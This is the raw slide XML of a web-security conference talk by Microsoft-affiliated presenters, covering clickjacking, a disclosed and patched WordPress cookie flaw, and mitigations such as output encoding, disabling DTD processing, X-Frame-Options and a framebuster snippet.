Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Shee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m.facebook.com/profile.ph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7.png"/><Relationship Id="rId4"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carybeastsecurity.blogspot.com/2008/11/cookie-forcing.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code.google.com/p/browsersec/wiki/Part2"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www.msn.com/"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tools.ietf.org/html/draft-abarth-cake-0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en.wikipedia.org/wiki/File:WordPress_logo.sv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hyperlink" Target="http://en.wikipedia.org/wiki/File:WordPress_logo.svg" TargetMode="External"/><Relationship Id="rId7"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55.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.x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en.wikipedia.org/wiki/File:WordPress_logo.svg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/></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en.wikipedia.org/wiki/File:WordPress_logo.svg" TargetMode="External"/><Relationship Id="rId7"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4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752600"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>New Ways I’m Going to Hack Your Web App</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4267200"/>
            <a:ext cx="7305675" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rich Lundeen, Jesse Ou, Travis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rhodes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2917567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Clickjacking is Lame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many people don’t take clickjacking seriously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Well Documented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Clickjacking page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Microsoft SDL Recommendation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36932230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pedi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8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005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 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926275" y="1752600"/>
            <a:ext cx="7543800" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>We reported this to the vendor through MSVR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Within 72 hours, the vulnerable features were taken offline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Patch was released in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> 3.1.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Output encoding of cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>alue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Stricter validation of media types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341996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XML XSS Attack Mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="8229600" cy="2362200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Tighten up Error Handling and Perform Output Encoding on Exception Messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only return generic exception messages back to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP.NET, this can be accomplished by using the appropriate encoding functions that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>part </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> library.  For ASP.NET MVC, consider using the &lt;%: %&gt; syntax for output encoding.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2750008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XML XSS Attack Mitigations (Continued)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="8229600" cy="2362200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Disable DTD Processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example, if using the .NET framework for XML processing, check that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XmlReaderSettings.DtdProcessing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> property is set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DtdProcessing.Prohibit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (the default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>).</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91000"/>
            <a:ext cx="843741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96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XML XSS Attack Mitigations (Continued)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Content-Disposition for XML downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>header prevents the browser from rendering the contents, and instead, forces the user to download the file.  In this way, malicious XML that contains active content (JavaScript) cannot be executed in the context of the domain serving the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265242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Summing it all UP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hat was a lot of stuff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="822759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a:xfrm>
            <a:off x="152400" y="1600200"/>
            <a:ext cx="8839200" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What do these vulnerabilities around Cookies, Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and XML have to do with each other?  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>These are examples of the new “low hanging fruit” we are finding around our services and around Microsoft, in addition to the old school ones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1802197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Ahead of Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requirements and recommendations in the MS SDL would have prevented almost all of the vulnerabilities in this presentation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encode Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validate Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-Frame-Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proper CSRF (get a buddy for custom approaches)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML Entity Resolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More Security Engineers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327240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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ore questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>richard.lundeen@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>jesseou@microsoft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>travisr@microsoft.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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395345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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8305800" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.owasp.org/index.php/Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Evans blog about “Cookie Forcing”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://msdn.microsoft.com/en-us/library/533texsx(VS.71).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunting Security Bugs, Chapter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>11</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173160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Clicks on Stuff?</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905000"/>
            <a:ext cx="8820150" cy="4371975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
          <a:extLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="3505200"/>
            <a:ext cx="990600" cy="457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514600" y="4090987"/>
            <a:ext cx="1066800" cy="1762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86300" y="4090987"/>
            <a:ext cx="495300" cy="1762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751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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delegates, please complete the feedback survey forms.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4111245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Clicks on Stuff?</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400675" cy="4830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76400" y="1676400"/>
            <a:ext cx="18288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686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Clicks on Stuff?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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85439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1752600"/>
            <a:ext cx="2438400" cy="60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652962" y="1752600"/>
            <a:ext cx="1366838" cy="304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8791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Clickjacking Mitigations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1474520"/>
            <a:ext cx="6629400" cy="1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The goal is to not be framed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-Frame-Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript</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140034"/>
            <a:ext cx="397764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147951"/>
            <a:ext cx="3429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48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Clickjacking Mitigations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-FRAME OPTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP Header prevents a page from being framed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only newer browsers support it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>same-origin or deny</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Framebuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. if(top != self) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>top.location.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(location);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1056438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JavaScript as Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
